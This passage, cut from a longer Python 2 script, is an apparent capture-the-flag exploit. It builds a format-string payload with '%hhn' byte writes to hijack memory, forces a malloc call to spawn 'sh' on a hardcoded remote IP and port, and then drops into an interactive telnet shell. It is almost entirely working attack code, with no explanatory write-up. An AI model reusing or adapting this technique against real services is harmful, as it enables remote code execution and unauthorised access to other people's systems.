  diff, cnt = getoffset((WHAT2 >> 16) & 0xff, cnt)
  print (WHAT >> 16) & 0xff, diff, hex(cnt)
  fmt += "%" + str(diff) + "c" + "%12$hhn"

  diff, cnt = getoffset((WHAT2 >> 24) & 0xff, cnt)
  print (WHAT >> 24) & 0xff, diff, hex(cnt)
  fmt += "%" + str(diff) + "c" + "%13$hhn"  

  # Trigger the malloc, use addr of "sh\0\0" as width.
  fmt += "%" + str(WHERE2 - 32) + "s"

  # Padding to 4. Probably not needed.
  while (len(fmt) % 4) != 0:
    fmt += "|"

  print len(fmt)
  if '\n' in fmt:
    print "OOOOOOOOOPSSSSSS \\n in payload lol"
  s.sendall(fmt + "\n")
  s.sendall("echo -- it worked --\n")
  s.recvuntil("-- it worked --\n")
  print "Shell opened!"

  # Interactive sockets.
  t = telnetlib.Telnet()
  t.sock = s
  t.interact()

  s.close()

HOST = '202.120.7.210'
PORT = 12321
go()